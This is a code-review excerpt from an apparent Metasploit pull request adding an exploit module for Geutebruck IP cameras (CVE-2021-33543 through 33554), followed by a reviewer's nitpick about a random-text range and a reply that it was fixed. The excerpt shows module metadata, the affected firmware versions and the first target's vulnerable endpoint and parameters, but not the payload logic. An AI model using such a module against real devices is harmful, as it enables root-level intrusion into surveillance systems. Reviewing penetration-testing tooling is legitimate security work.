modules/exploits/linux/http/geutebruck_cmdinject_cve_2021_335xx.rb

```diff
@@ -0,0 +1,186 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Geutebruck Multiple Remote Command Execution',
+        'Description' => %q{
+          This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder
+          and exploits multiple authenticated arbitrary command execution vulnerabilities within
+          the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,
+          EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as
+          well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in
+          remote code execution as the root user.
+        },
+
+        'Author' => [
+          'Titouan Lazard', # Of RandoriSec - Discovery
+          'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
+          'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2021-33543'],
+          ['CVE', '2021-33544'],
+          ['CVE', '2021-33548'],
+          ['CVE', '2021-33550'],
+          ['CVE', '2021-33551'],
+          ['CVE', '2021-33552'],
+          ['CVE', '2021-33553'],
+          ['CVE', '2021-33554'],
+          [ 'URL', 'http://geutebruck.com' ],
+          [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
+          [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
+        ],
+        'DisclosureDate' => '2021-07-08',
+        'Privileged' => true,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'CVE-2021-33544 - certmngr.cgi', {
+              'http_method' => 'GET',
+              'http_vars' => {
+                'action' => 'createselfcert',
+                'local' => Rex::Text.rand_text_alphanumeric(10..16),
+                'country' => Rex::Text.rand_text_alphanumeric(2..2),
```

Comment:
```suggestion
                'country' => Rex::Text.rand_text_alphanumeric(2),
```

This is a range that goes from 2 characters to.....umm....2 characters? You'd be better off doing ` Rex::Text.rand_text_alphanumeric(2)` here if this was your intention.

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/15603/commits/c24f03628e5e4bbfcd78cca9f8d0da4e339e177b